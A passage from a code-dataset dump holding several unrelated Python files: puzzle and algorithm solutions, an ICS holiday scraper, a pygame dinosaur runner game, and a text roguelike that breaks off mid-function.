","repo_name":"ZH-pku/xgb_vegetation_mapping","sub_path":"feature_computing/geographic_features/codes/processgeotiff.py","file_name":"processgeotiff.py","file_ext":"py","file_size_in_byte":2754,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"7054316499","text":"# Problem No.: 2775\n# Solver: Jinmin Goh\n# Date: 20200309\n# URL: https://www.acmicpc.net/problem/2775\n\nimport sys\n\ndef main():\n n = int(input())\n nums = []\n for i in range(n):\n temp = []\n temp.append(int(input()))\n temp.append(int(input()))\n nums.append(temp)\n table = [[0] * 14 for i in range(15)]\n table[0] = [i + 1 for i in range(14)]\n for i in range(1,15):\n for j in range(14):\n table[i][j] = sum(table[i - 1][:j + 1])\n for i in nums:\n print(table[i[0]][i[1] - 1])\n return\n\nif __name__ == \"__main__\":\n main()","repo_name":"Jinmin-Goh/BOJ_PS","sub_path":"Solved/02775/02775.py","file_name":"02775.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22535780253","text":"import requests\nimport json\nimport dateutil\nimport pandas as pd\nfrom datetime import datetime\nfrom bs4 import BeautifulSoup\nfrom urllib.request import urlopen\nimport datetime as dt\nimport csv\nfrom icalendar import Calendar, Event\n\n#Get iso code for available countries on website\nmy_url = \"https://www.officeholidays.com/ics/\"\nuClient = urlopen(my_url)\npage_html = uClient.read()\nuClient.close()\npage_soup = BeautifulSoup(page_html, \"html.parser\")\nfish_soup = page_soup.find(\"table\",{\"class\":\"info-table\"}).findAll(\"a\")\niso_code = []\nfor fish in fish_soup:\n iso_code.append(fish[\"href\"][-2:])\n\n#Read ics file and output results\nwith open(\"holiday.csv\",'w',encoding = 'UTF-8', newline='') as fd:\n writer = csv.writer(fd)\n writer.writerow([\"Location\",\"Category\", \"Title\", \"Date\"])\n base_url = \"https://www.officeholidays.com/ics/ics_country_code.php?iso=\"\n for iso in iso_code:\n url = base_url + iso\n response = requests.get(url)\n gcal = Calendar.from_ical(response.content) #Convert into ics \n for component in gcal.walk():\n if component.name == \"VEVENT\" and dateutil.parser.parse(component.get('dtstart').to_ical()).date() > dt.date.today():\n row = [\n component.get('summary').split(\":\")[0].strip(), # Get Country\n \"Holiday\",\n component.get('summary').split(\":\")[1].strip(), # Get name of Holiday\n dateutil.parser.parse(component.get('dtstart').to_ical()).date() \n ]\n 
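# The icalendar pattern used in this script, reduced to its core;
# "sample.ics" is a placeholder path:
from icalendar import Calendar

gcal = Calendar.from_ical(open("sample.ics", "rb").read())
for ev in gcal.walk("VEVENT"):
    print(ev.get("summary"), ev.decoded("dtstart"))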
writer.writerow(row)","repo_name":"thisisbowen/Extract_Holidays_from_ics","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":1564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"5595906168","text":"import pygame\nimport os, sys, random\n\npygame.init()\n\nscr_size = (width,height) = (600,150)\nFPS = 60\ngravity = 0.6\n\nblack = (0,0,0)\nwhite = (255,255,255)\nbackground_col = (235,235,235)\n\nscreen = pygame.display.set_mode(scr_size)\nclock = pygame.time.Clock()\npygame.display.set_caption(\"T-Rex Rush\")\nkPoint_sound = pygame.mixer.Sound('sprites/checkPoint.wav')\n\ndef load_image(\n    name,\n    sizex=-1,\n    sizey=-1,\n    colorkey=None,\n    ):\n\n    fullname = os.path.join('sprites', name)\n    image = pygame.image.load(fullname)\n    image = image.convert()\n    if colorkey is not None:\n        if colorkey == -1:\n            colorkey = image.get_at((0, 0))\n        image.set_colorkey(colorkey, pygame.RLEACCEL)  # bare RLEACCEL is not imported here, so it must be qualified\n\n    if sizex != -1 or sizey != -1:\n        image = pygame.transform.scale(image, (sizex, sizey))\n\n    return (image, image.get_rect())\n\ndef load_sprite_sheet(\n        sheetname,\n        nx,\n        ny,\n        scalex = -1,\n        scaley = -1,\n        colorkey = None,\n        ):\n    fullname = os.path.join('sprites',sheetname)\n    sheet = pygame.image.load(fullname)\n    sheet = sheet.convert()\n\n    sheet_rect = sheet.get_rect()\n\n    sprites = []\n\n    sizex = sheet_rect.width/nx\n    sizey = sheet_rect.height/ny\n\n    for i in range(0,ny):\n        for j in range(0,nx):\n            rect = pygame.Rect((j*sizex,i*sizey,sizex,sizey))\n            image = pygame.Surface(rect.size)\n            image = image.convert()\n            image.blit(sheet,(0,0),rect)\n\n            if colorkey is not None:\n                if colorkey == -1:\n                    colorkey = image.get_at((0,0))\n                image.set_colorkey(colorkey,pygame.RLEACCEL)\n\n            if scalex != -1 or scaley != -1:\n                image = pygame.transform.scale(image,(scalex,scaley))\n\n            sprites.append(image)\n\n    sprite_rect = sprites[0].get_rect()\n\n    return sprites,sprite_rect\n\ndef disp_gameOver_msg(retbutton_image,gameover_image):\n    retbutton_rect = retbutton_image.get_rect()\n    retbutton_rect.centerx = width / 2\n    retbutton_rect.top = height*0.52\n\n    gameover_rect = gameover_image.get_rect()\n    gameover_rect.centerx = width / 2\n    gameover_rect.centery = height*0.35\n\n    screen.blit(retbutton_image, retbutton_rect)\n    screen.blit(gameover_image, gameover_rect)\n\ndef extractDigits(number):\n    if number > -1:\n        digits = []\n        i = 0\n        while(number/10 != 0):\n            digits.append(number%10)\n            number = int(number/10)\n\n        digits.append(number%10)\n        for i in range(len(digits),5):\n            digits.append(0)\n        digits.reverse()\n        return digits\n\ndef gameplay():\n    # global high_score\n    gamespeed = 4\n    startMenu = False\n    gameOver = False\n    gameQuit = False\n    playerDino = Dino(44,47)\n    new_ground = Ground(-1*gamespeed)\n    counter = 0\n\n    cacti = pygame.sprite.Group()\n    pteras = pygame.sprite.Group()\n    clouds = pygame.sprite.Group()\n    last_obstacle = pygame.sprite.Group()\n\n    Cactus.containers = cacti\n    Ptera.containers = pteras\n    Cloud.containers = clouds\n\n    retbutton_image,retbutton_rect = load_image('replay_button.png',35,31,-1)\n    gameover_image,gameover_rect = load_image('game_over.png',190,11,-1)\n\n    temp_images,temp_rect = load_sprite_sheet('numbers.png',12,1,11,int(11*6/5),-1)\n    HI_image = pygame.Surface((22,int(11*6/5)))\n    HI_rect = HI_image.get_rect()\n    HI_image.fill(background_col)\n    HI_image.blit(temp_images[10],temp_rect)\n    temp_rect.left += temp_rect.width\n    HI_image.blit(temp_images[11],temp_rect)\n    HI_rect.top = height*0.1\n    HI_rect.left = width*0.73\n\n    while not 
gameQuit:\n while startMenu:\n pass\n while not gameOver:\n if pygame.display.get_surface() == None:\n print(\"Couldn't load display surface\")\n gameQuit = True\n gameOver = True\n else:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n gameQuit = True\n gameOver = True\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE:\n if playerDino.rect.bottom == int(0.98*height):\n playerDino.isJumping = True\n playerDino.movement[1] = -1*playerDino.jumpSpeed\n\n if event.key == pygame.K_DOWN:\n if not (playerDino.isJumping and playerDino.isDead):\n playerDino.isDucking = True\n\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_DOWN:\n playerDino.isDucking = False\n for c in cacti:\n c.movement[0] = -1*gamespeed\n if pygame.sprite.collide_mask(playerDino,c):\n playerDino.isDead = True\n\n for p in pteras:\n p.movement[0] = -1*gamespeed\n if pygame.sprite.collide_mask(playerDino,p):\n playerDino.isDead = True\n\n if len(cacti) < 2:\n if len(cacti) == 0:\n last_obstacle.empty()\n last_obstacle.add(Cactus(gamespeed,40,40))\n else:\n for l in last_obstacle:\n if l.rect.right < width*0.7 and random.randrange(0,50) == 10:\n last_obstacle.empty()\n last_obstacle.add(Cactus(gamespeed, 40, 40))\n\n if len(pteras) == 0 and random.randrange(0,200) == 10 and counter > 500:\n for l in last_obstacle:\n if l.rect.right < width*0.8:\n last_obstacle.empty()\n last_obstacle.add(Ptera(gamespeed, 46, 40))\n\n if len(clouds) < 5 and random.randrange(0,300) == 10:\n Cloud(width,random.randrange(height/5,height/2))\n\n playerDino.update()\n cacti.update()\n pteras.update()\n clouds.update()\n new_ground.update()\n\n if pygame.display.get_surface() != None:\n screen.fill(background_col)\n new_ground.draw()\n clouds.draw(screen)\n cacti.draw(screen)\n pteras.draw(screen)\n playerDino.draw()\n\n pygame.display.update()\n clock.tick(FPS)\n\n if playerDino.isDead:\n gameOver = True\n\n if counter%700 == 699:\n new_ground.speed -= 1\n gamespeed += 1\n\n counter = (counter + 1)\n\n if gameQuit:\n break\n\n while gameOver:\n if pygame.display.get_surface() == None:\n print(\"Couldn't load display surface\")\n gameQuit = True\n gameOver = False\n else:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n gameQuit = True\n gameOver = False\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n gameQuit = True\n gameOver = False\n\n if event.key == pygame.K_RETURN or event.key == pygame.K_SPACE:\n gameOver = False\n gameplay()\n if pygame.display.get_surface() != None:\n disp_gameOver_msg(retbutton_image,gameover_image)\n pygame.display.update()\n clock.tick(FPS)\n\n pygame.quit()\n quit()\n\ndef main():\n gameplay()\n\nmain()","repo_name":"nomadlife/python-exercise","sub_path":"Module_pygame/pygame_trex_reverse_1.py","file_name":"pygame_trex_reverse_1.py","file_ext":"py","file_size_in_byte":7720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42397640142","text":"\nfrom injection import input_injection\nfrom year2022.day07.a import get_data\n\n\n@input_injection\ndef main(_input: str) -> str:\n result: int = 0\n\n space_used, tree = get_data(_input)\n\n total_space = 70000000\n need_space = 30000000\n\n free_up = need_space - (total_space - space_used)\n\n possible_dirs = [v for v in tree.values() if v >= free_up]\n result = min(possible_dirs)\n\n return str(result)\n\n\nif __name__ == \"__main__\":\n 
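# The selection above, as a standalone sketch using the well-known sample
# directory sizes from the day 7 puzzle statement:
tree = {"/": 48381165, "/a": 94853, "/a/e": 584, "/d": 24933642}
free_up = 30000000 - (70000000 - tree["/"])
print(min(v for v in tree.values() if v >= free_up))  # -> 24933642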
print(main())\n","repo_name":"justcallmelarry/advent-of-code","sub_path":"src/year2022/day07/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6222103129","text":"# Definition for a binary tree node\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n # @param preorder, a list of integers\n # @param inorder, a list of integers\n # @return a tree node\n def buildTree(self, preorder, inorder):\n n = len(preorder)\n if n == 0:\n return None\n if n == 1:\n return TreeNode(preorder[0])\n \n root = TreeNode(preorder[0])\n k = inorder.index(preorder[0])\n root.left = self.buildTree(preorder[1:k+1], inorder[:k])\n root.right = self.buildTree(preorder[k+1:], inorder[k+1:])\n return root\n","repo_name":"Shuaiyicao/leetcode-python","sub_path":"105.py","file_name":"105.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"10595378659","text":"import random\n\n\ndef merge_sort(lst):\n \"\"\"归并排序\"\"\"\n if len(lst) <= 1: # 分开到列表只剩下一个值\n return lst\n num = len(lst) // 2 # 每次对半分开\n left = merge_sort(lst[:num]) # 分开一个个左列表\n right = merge_sort(lst[num:]) # 分开一个个右列表\n return merge(left, right) # 分开完之后, 一个个归并\n\n\ndef merge(left, right):\n \"\"\"归并部分\"\"\"\n l, r = 0, 0 # 左右指针\n result = [] # 合并后的新表\n while l < len(left) and r < len(right): # 移动左右指针的值\n if left[l] < right[r]: # 比较左右两边的值\n result.append(left[l])\n l += 1\n else:\n result.append(right[r])\n r += 1\n result += left[l:] # 最后有一个值没有对手比较, 不确定在哪个表\n result += right[r:] # 左右有个指针会移出去(大于下标), 有个列表是空的\n return result\n\n\nif __name__ == '__main__':\n li = list(range(100))\n random.shuffle(li)\n print(li)\n li_ = merge_sort(li)\n print(li_)\n\n\n\"\"\"\n归并排序\n2个函数\n1. 递归分开列表, return合并列表函数\n2. 合并列表函数\n\n\n详细\n1. 函数\n递归停止条件, 分开列表只有一个值\n指定分割值\n左列表分割递归\n右列表分割递归\n返回 合并列表函数\n\n\n2. 函数\n设定左右指针初始值\n设定接受列表为空\n\n\n左右列表比对循环\n指针不超过左右列表长度\nif 左右值比对\n\t加入接受列表\n\t左指针加一\nelse \n\t相反\n接受列表 += 剩下的值\n返回 接受列表\n\"\"\"","repo_name":"pol9111/algorithms","sub_path":"排序/归并排序.py","file_name":"归并排序.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71446023208","text":"import os\nimport keyboard\nimport random\nimport time\nimport urllib.request\nfrom datetime import datetime\nclear = lambda: os.system('cls')\ncolor = lambda: os.system('color 4F')\nexit = False\n\n# X Y Icon\n# 0 1 2\nplayer = [6, 7, \"@\"]\n\n\t\t\t\t\t\t\t# X\t\tY\tType\tCurrentHP \tWorld\nenemies_currently_generated = []\nmap = []\nworlds = [\n\t[\t\"................................................................M \",\n\t\t\"...... \",\n\t\t\"...... \",\n\t\t\"...... \",\n\t\t\"...... \",\n\t\t\"...... \",\n\t\t\"...... \",\n\t\t\"...... \",#World 0\n\t\t\"...... \",\n\t\t\"...... \",\n\t\t\" !!! 
\",\n\t\t\" \"\n\t],[\n\t\t\" #@@@# \",\n\t\t\"#####...########################## \",\n\t\t\">................................# \",\n\t\t\">..................######........# \",\n\t\t\">.......................########## \",\n\t\t\"~~~~~~>......................$ \",\n\t\t\"~~~~~~>......................$ \",\n\t\t\">............################# \", #World 1\n\t\t\">......#.....# \",\n\t\t\">......#.....# \",\n\t\t\"############## \",\n\t\t\" \"\n\t],[\n\t\t\"W######################################### \",\n\t\t\".........................................# \",\n\t\t\".... ....# \",\n\t\t\".... ....###########****##########\",\n\t\t\"......###############...........................................#\",\n\t\t\"~~~~..###.......................................................#\",\n\t\t\"!.....###############...........................................#\", #World 2\n\t\t\"!...............................................................#\",\n\t\t\"~~~~ ~~~~~~~ #\",\n\t\t\" \",\n\t\t\" \",\n\t\t\" \"\n\t],[\n\t\t\"############## \",\n\t\t\".............0 \",\n\t\t\".............# \",\n\t\t\"......####. \",\n\t\t\"......####. \",\n\t\t\".......... \", #World 3\n\t\t\"...... \",\n\t\t\"...... \",\n\t\t\"...... \",\n\t\t\"... \",\n\t\t\". \",\n\t\t\"$ \" \n\t],[\n\t\t\" ################################### \",\n\t\t\" ..................................# \",\n\t\t\"W........ * \",\n\t\t\"###...... \",\n\t\t\"### ...#########......... .................. \",\n\t\t\" ......................................... \",\n\t\t\" ###############.............................. \",\n\t\t\" ........................................... \", #World 4\n\t\t\" ...... \",\n\t\t\" ...... \",\n\t\t\" .. \",\n\t\t\" ## \"\n\t],[\n\t\t\" ############## MMMM# \",\n\t\t\"###0 .............# ....# \",\n\t\t\".... . .... ### ....# \",\n\t\t\".... . .....###### ....##########\",\n\t\t\". ...........................................#\",\n\t\t\". ###.......................................................#\", #World 5\n\t\t\"......### ...........................................#\",\n\t\t\" .. .... .. ......................... \",\n\t\t\" .... . .. .. ......................... \",\n\t\t\" ......... .. .. .... \",\n\t\t\" .. .. .... \",\n\t\t\" ...... $$$$ \"\n\t],[\n\t\t\"@....... ..... \",\n\t\t\" .. ....... ............ . . \",\n\t\t\" .. ... . . . . . . \",\n\t\t\" ........ . .... . . ........ . \",\n\t\t\" .. . . . . . . . \",\n\t\t\" .. ...... . .... . . ........ \",\n\t\t\" .. . . . . . \", #World 6\n\t\t\" .. . . .......... . .............. \",\n\t\t\" .. ............. . . . \",\n\t\t\"### .. . . . \",\n\t\t\"##[..... . . .... \",\n\t\t\"### ............. **** \"\n\t]\n]\ntriggersRaisin = [\n# From To ΔX ΔY\n# 0 1 2 3\n\t[1, 2, -29, 1],\n\t[1, 0, -4, 10],\n\t[2, 5, 0 , 8],\n\t[2, 3, 0, 11], \n\t[0, 6, -64, 0],\n\t[6, 5, -9,-11],\n\t[5, 4, 37 , 1], \n\t[3, 4, -13, 1] \n] \ngetOutofHere = [\"@\",\"!\",\"$\",\"W\",\"0\",\"*\",\"M\"]\n\nwhereYouAt = False #boolean that defines if the player has just changed maps\nwuhtChuWant = False #boolean that tells us if you don't want to pick up an item\n\nitem_high = 35\nitem_low = 1\n\nmax_y = 11\nmax_x = 65\n\nmaxHP = 10\ncurrentHP = 10\nattack = 2\ndefense = 0\nlevel = 0 \nXP = 0\n\nenemies = [ #description of enemy #HP #Attack #defense #XP worth #rarity #character\n\t[\"a medium sized raccoon. It stares at you with its eyes\", 10, 3, 2, 20, 15, \"D\", \"%\"],\n\t[\"a swarm of angry squirrel. 
They're making buzzing noises\",10, 2, 3 , 15, 20, \"O\", \"%\"],\n\t[\"a passed out homeless person\", 10, 0, 1, 5, 25, \"L\", \"&\"],\n\t[\"a young child who's lost their mother. They're shouting at you\" ,8, 4, 1, 15, 15,\"G\", \"&\"],\n\t[\"a cow. Why is there a cow???\", 15, 1 , 3, 15, 15,\"F\", \"%\"],\n\t[\"a tourist asking for directions. You have no idea how to help\", 10, 2, 4, 15, 15,\"H\", \"&\"],\n\t[\"a teenager that just got off their shift at Taco Bell. Where's your crunch wrap?\", 8, 5, 2, 20, 15,\"J\", \"&\"] #Note character is not what is displayed\n]\n\nitems = [\n\t#name #HP increase #attack increase #defense increase #level increase #XP increase #rarity #quantity \n\t[\"a pouch of Capri Sun\", 2, 0, 0, 0, 0, 20, 0],\n\t[\"a half eaten chocolate bar\", 2, 1, 0, 0, 0, 10, 0],\n\t[\"something you really shouldn't be putting in your mouth\", -2, 0, 0, 0, 12,20, 0],\n\t[\"a pack of Fruit Gushers\", 2, 0, 0, 0, 0, 20, 0]\n]\n\nshieldid = 0 #current shielf\nshields = [\n\t#name #def increase\n\t[\"no shield\", 0],\n\t[\"a paper plate\", 1],\n\t[\"a paper bag\", 2],\n\t[\"last week's newpaper\",2],\n\t[\"a clipboard\", 2],\n\t[\"an umbrella\", 1],\n\t[\"a trash can lid\", 2],\n\t[\"a white board\",1],\n\t[\"a captain America shield\", 2]\n]\n\nswordid = 0 #current sword\nswords = [\n\t# name #attack increase\n\t[\"no weapon\", 0],\n\t[\"an unopened toothpick\", 2],\n\t[\"a spork from Wendy's\", 2],\n\t[\"a butterknife from Denny's\", 2],\n\t[\"a pack of unsharpened pencils bound with a rubberband\", 2],\n\t[\"a heavy switchblade that you don't know how to open\",1],\n\t[\"a large bag of expired candy\",1],\n\t[\"a baseball bat\", 3]\n]\n\nname = \"\"\n\nmapNum = 1\n\npassword = False\n\nTrash_Counter = 0\n\nenemies_in_worlds = [0,0,0,0,0,0,0] \n\ndef main():\n\tglobal mapNum, name, clear, player, map, worlds, triggersRaisin, getOutofHere, whereYouAt, wuhtChuWant, item_high, item_low, max_y, max_x, maxHP, currentHP, attack, defense, level, XP, items, shieldid, shields, swordid, swords\n\thighScoresHere()\n\tname = input(\"What's your name? 
: \")\n\tlogThatStuff(\"has started playing the game \")\n\n\ttrashGenerator()\n\t\n\t\n\tmapNum = 1\n\t\n\tmap = worlds[mapNum][:]\n\tweShouldAddSomeEnemies()\n\tdrawMap() #draws map original instance\n\n\twhile not exit:\n\t\treadKeyStrokes()\n\t\t\ndef readKeyStrokes():\n\tglobal player, wuhtChuWant, whereYouAt, password\n\n\tcurrentx = player[0]\n\tcurrenty = player[1]\n\t\n\tif keyboard.is_pressed('d') and not defineWalls(getTileAt(player[0] + 1, player[1])): #allows movement to the right if d is pressed and there is no barrier \n\t\tplayer[0] += 1\n\t\t\n\tif keyboard.is_pressed('a') and not defineWalls(getTileAt(player[0] - 1, player[1])): #allows movement to the left if a is pressed and there is no barrier \n\t\tplayer[0] -= 1\n\t\t\n\tif keyboard.is_pressed('w') and not defineWalls(getTileAt(player[0], player[1] - 1)): #allows movement up if w is pressed and there is no barrier \n\t\tplayer[1] -= 1\n\t\t\n\tif keyboard.is_pressed('s') and not defineWalls(getTileAt(player[0], player[1] + 1)): #allows movement down if s is pressed and there is no barrier \n\t\tplayer[1] += 1\n\t\n\tif not keyboard.is_pressed('d') and not keyboard.is_pressed('a') and not keyboard.is_pressed('w') and not keyboard.is_pressed('s'): # 's' here, not 'a' twice, so items can also be used while standing still\n\t\tomNomTheNomNoms()\n\t\n\tif player[0] != currentx or player[1] != currenty:\n\t\tthetypeofbadguywearefacing = isThereABADGUYhere(player[0],player[1])\n\t\tif thetypeofbadguywearefacing >= 0:\n\t\t\tplayer[0] = currentx\n\t\t\tplayer[1] = currenty\n\t\t\ttimeToFight(thetypeofbadguywearefacing)\n\t\t\ttime.sleep(1/2)\n\t\telse:\n\t\t\tif newRoom(getTileAt(player[0], player[1])) == -1:\n\t\t\t\twhereYouAt = False\n\t\t\twuhtChuWant = False\n\t\thesGonnaGetChu()\n\t\tdrawMap()\n\t\n\tif wuhtChuWant == False and getTileAt(player[0], player[1]) == \"+\": #allows player to pick up an item or leave it. If picked up it is removed from the board\n\t\tstatus = \"You found an item! (press space)\" #I did it for aesthetics\n\t\tprint(status)\n\t\twhile True:\n\t\t\tif keyboard.is_pressed(' '):\n\t\t\t\tbreak\n\t\tstatus = \"Would you like to pick it up? (Y or N)\"\n\t\tprint(status)\n\t\t\n\t\tgiveRandomItem()\n\t\t\n\t\n\tif wuhtChuWant == False and getTileAt(player[0], player[1]) == \"x\": #This mimics picking up an item, but it's a key item -- the password\n\t\tstatus = \"You found an item! (press space)\" #I did it for aesthetics\n\t\tprint(status)\n\t\twhile True:\n\t\t\tif keyboard.is_pressed(' '):\n\t\t\t\tbreak\n\t\tstatus = \"Would you like to pick it up? (Y or N)\"\n\t\tprint(status)\n\t\tpassword = thePasswordIsInWorld4()\n\t\t\n\t\n\t\t\n\tcheckForPizzaPlace()\n\n\tloadMap(newRoom(getTileAt(player[0], player[1])))\n\ndef trashGenerator():\n\tglobal worlds, mapNum, item_low, item_high, map \n\tfor world in range(len(worlds)):\n\t\tnumitems = random.randint(item_low,item_high) \n\t\tmapNum = world\n\t\tmap = worlds[mapNum][:]\n\t\tfor _ in range(numitems): #this bit of code decides how much trash will be on each level and then it puts it on the map at a random x/y coordinate that is also not a wall etc\n\t\t\twhile True:\n\t\t\t\titemx = random.randint(0, max_x-1)\n\t\t\t\titemy = random.randint(0, max_y-1)\n\t\t\t\tif getTileAt(itemx, itemy) == \".\":\n\t\t\t\t\tworlds[world] = placeCharacter(\"+\", itemx, itemy, worlds[world])\n\t\t\t\t\tbreak\n\t\tif mapNum == 4:\n\t\t\twhile True:\n\t\t\t\titemx = random.randint(0, max_x-1) #This does the same thing, but only in world 4 after a certain x/y coordinate. 
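# The rarity roulette used by generateItem() and weShouldAddSomeEnemies(),
# as a standalone sketch: each candidate index is repeated "rarity" times in
# a pool, then one entry is drawn uniformly.
import random

weights = [20, 10, 20, 20]  # the items' rarity column above
pool = [i for i, w in enumerate(weights) for _ in range(w)]
picked = pool[random.randint(0, len(pool) - 1)]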
This randomly generates the location of the password\n\t\t\t\titemy = random.randint(0, max_y-1)\n\t\t\t\tif itemx>20 and itemy>4:\n\t\t\t\t\tif getTileAt(itemx, itemy) == \".\":\n\t\t\t\t\t\tworlds[world] = placeCharacter(\"x\", itemx, itemy, worlds[world])\n\t\t\t\t\t\tbreak\n\t\t\t\t\t\ndef giveRandomItem():\n\tglobal items, swords, shields, swordid, shieldid, attack, defense, wuhtChuWant, Trash_Counter\n\twhile True:\n\t\tif keyboard.is_pressed('y'):\n\t\t\tthing = generateItem()\n\t\t\tif thing >= 0: #this is a consumeable item\n\t\t\t\tprint(\"You found \" + items[thing][0] + \". You can put this in your mouth!\") \n\t\t\t\titems[thing][7] = (items[thing][7]+1) #adds to inventory\n\t\t\t\tlogThatStuff(\"has picked up a consumeable item \")\n\t\t\telif thing == -1:\n\t\t\t\tif swordid < len(swords)-1: #this is a sword\n\t\t\t\t\tswordid += 1 #upgrades your sword\n\t\t\t\t\tprint(\"You found \" + swords[swordid][0] + \"! You can swing this like a sword!\")\n\t\t\t\t\tprint(\"You increased your attack by \" + str(swords[swordid][1]) + \".\")\n\t\t\t\t\tattack += swords[swordid][1] #upgrades your attack\n\t\t\t\t\tlogThatStuff(\"has picked up a sword \")\n\t\t\t\telse: \n\t\t\t\t\tthing = -89\n\t\t\telif thing != -89: #this is a shield \n\t\t\t\tif shieldid < len(shields)-1:\n\t\t\t\t\tshieldid += 1 #upgrades shield\n\t\t\t\t\tprint(\"You found \" + shields[shieldid][0] + \"! You can use this as a shield!\")\n\t\t\t\t\tprint(\"You increased your defense by \" + str(shields[shieldid][1]) + \".\")\n\t\t\t\t\tdefense += shields[shieldid][1] #upgrades defense\n\t\t\t\t\tlogThatStuff(\"has picked up a shield \")\n\t\t\t\telse:\n\t\t\t\t\tthing = -89\n\t\t\tif thing == -89:\n\t\t\t\ta = random.randint(0,11)\n\t\t\t\tTrash_Counter +=1 #this counts how much garbage you've encountered \n\t\t\t\tprint(\"Oh... It's just \" + [\"a used napkin. It's got a mustard stain\",\"an empty video game case. Wish there was something to play\",\"a broken bottle. Looks sort of like dad's\", \"a plastic cup. There's still coffee in it\",\"a battery. Something is oozing out of it\", \"an entire tire. I can't carry this\",\"a burnt cigarette. My teacher said not to touch this\",\"a match box. It is empty though..\",\"a used bottle rocket. Who shot this off..\",\"a 10 piece mcNugget! It's empty..\",\"a plastic spoon. It's melted on the bottom\", \"a crumpled up piece of paper. It reads Ev__t_on N_t_ce. You can't quite make it out\"][a] + \". Better put it back.\")\n\t\t\tplaceCharacter(\".\", player[0], player[1], worlds[mapNum])\n\t\t\tplaceCharacter(\".\", player[0], player[1], map)\n\t\t\tlogThatStuff(\"has picked up trash ... and put back down \") \n\t\t\tbreak\n\t\tif keyboard.is_pressed('n'):\n\t\t\twuhtChuWant = True\n\t\t\tdrawMap()\n\t\t\tbreak\n\t\t\t\t\t\ndef couldBeAWallFam():\n\treturn\t\n\ndef logThatStuff(whatHappened): #creates a log of when characters do things\n\tglobal name\n\tfile = open(\"Log.txt\", \"a+\")\n\tfile.write(\"\\n\" + name + \" \"+ whatHappened + \" at \" + str(datetime.now()))\n\t\n\ndef replaceNth(row, index, replacement):\n\treturn row[:(index-1)] + replacement + row[(index):]\n\ndef getTileAt(x, y):\n\tglobal max_x, max_y\n\tif x < 0 or y < 0 or x > max_x or y > max_y:\n\t\treturn \"#\"\n\treturn map[y][x-1] #returns character that is one tile next to the player's current location. 
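# Map transitions in loadMap() below apply a (dx, dy) offset for each
# (from, to) world pair, and the inverse offset when walking back; the same
# lookup in isolation:
def shift(player, prev_world, new_world, triggers):
    # triggers rows are [from_world, to_world, dx, dy], as in triggersRaisin
    for f, t, dx, dy in triggers:
        if (f, t) == (prev_world, new_world):
            return [player[0] + dx, player[1] + dy]
        if (t, f) == (prev_world, new_world):
            return [player[0] - dx, player[1] - dy]
    return player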
Direction determined by arguments.\n\ndef loadMap(newWorld):\n\tglobal map, mapNum, whereYouAt\n\tif newWorld == -1 or whereYouAt == True:\n\t\treturn\n\telse: #this puts you on a new map\n\t\twhereWeWereAMomentAgo = mapNum \n\t\tmapNum = newWorld\n\t\tmap = worlds[newWorld][:]\n\t\tfor grape in range(len(triggersRaisin)): #This is a joke. It's an array within an array. I decided those are called raisins \n\t\t\tif triggersRaisin[grape][0] == whereWeWereAMomentAgo and triggersRaisin[grape][1] == newWorld: \n\t\t\t\tplayer[0] += triggersRaisin[grape][2]\n\t\t\t\tplayer[1] += triggersRaisin[grape][3]\n\t\t\t\tbreak\n\t\t\tif triggersRaisin[grape][1] == whereWeWereAMomentAgo and triggersRaisin[grape][0] == newWorld:\n\t\t\t\tplayer[0] -= triggersRaisin[grape][2]\n\t\t\t\tplayer[1] -= triggersRaisin[grape][3]\n\t\t\t\tbreak\n\t\tlogThatStuff(\"entered into world \" + str(worlds[newWorld]))\n\t\tweShouldAddSomeEnemies()\n\t\tdrawMap()\n\t\twhereYouAt = True\n\t\t\ndef drawUI(): #this is the stuff the player sees under the map and is interactable \n\tglobal status, maxHP, currentHP\n\tif currentHP > maxHP/2:\n\t\tstatus = \"\\nStatus: Let's go on an adventure!\"\n\tif currentHP == maxHP/2:\n\t\tstatus = \"\\nStatus: Just a little longer. You're doing great!\"\n\tif currentHP < maxHP/2:\n\t\tstatus = \"\\nStatus: You don't feel so good.\"\n\tif currentHP == 1:\n\t\tstatus = \"\\nStatus: !!!!!!!!!!!!\"\n\tglobal attack, defense, level, XP, swordid, swords, shieldid, shields\n\tprint( \"Level: \" + str(level) + \" -- Current HP: \" + str(currentHP) +\"/\" + str(maxHP)+ \" -- Current Attack: \" + str(attack) + \" -- Current Defense: \" + str(defense) + \" -- Current XP: \" + str(XP) )\n\tprint(status)\n\tprint(\"\\nWeapon: \" + swords[swordid][0])\n\tprint(\"Shield: \" + shields[shieldid][0] + \"\\n\")\n\t\n\t\t#do this before and after inventory block but only when items exist -- print(\"******************************************************************************************************************** \\n\")\n\tindividualtypesofitem = 0\n\tfor _ in range(len(items)): #this adds items and sees how many types of items you have\n\t\tif items[_][7] > 0:\n\t\t\tindividualtypesofitem += 1\n\t\t\tprint(\"[\" + str(individualtypesofitem) + \"] \" + str(items[_][0]) + \" (\" + str(items[_][7]) + \"x)\")\n\t\t\t\n\tif password is True:\n\t\tprint(\"A scrap of paper\")\n\t\ndef placeCharacter(character, xCoor, yCoor, display): \n\tdisplay[yCoor] = replaceNth(display[yCoor], xCoor, character) #places character on map\n\treturn display #returns map with character placed on it\n\t\ndef drawMap():\n\tglobal player, mapNum\n\tclear() #clears map\n\tdisplay = map[:] #copies map to display\n\t\n\tfor 